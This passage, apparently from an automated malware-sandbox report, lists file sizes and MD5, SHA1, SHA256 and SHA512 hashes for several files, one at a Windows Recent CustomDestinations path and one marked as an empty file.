  SHA256: c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
  SHA512: 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

- Filesize: 693KB
  MD5: 7de6fdf3629c73bf0c29a96fa23ae055
  SHA1: dcb37f6d43977601c6460b17387a89b9e4c0609a
  SHA256: 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
  SHA512: d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

- Filesize: 1KB
  MD5: 7ea1fec84d76294d9256ae3dca7676b2
  SHA1: 1e335451d1cbb6951bc77bf75430f4d983491342
  SHA256: 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
  SHA512: ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 43d77b69fda94931904d5652ffad3a8a
  SHA1: 258d1c37b8189e81b24b9c5ec62f612d265be59f
  SHA256: 0287bdc50148224c4c3a89d33b53b38cba6de7de68a023af91cb3f0025951218
  SHA512: d47530d0363c7fe455da0842fdea4780880513b0d0054399e629b302cbb19d52a08d7dee043578b8cae600a29febffeb5a67464b8e979b455f69bded061c636c

- (zero-byte file: these are the well-known hashes of empty input, so this entry carries no content)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

- Filesize: 71KB
  MD5: 8ba2e41b330ae9356e62eb63514cf82e
  SHA1: 8dc266467a5a0d587ed0181d4344581ef4ff30b2
  SHA256: ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
  SHA512: 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d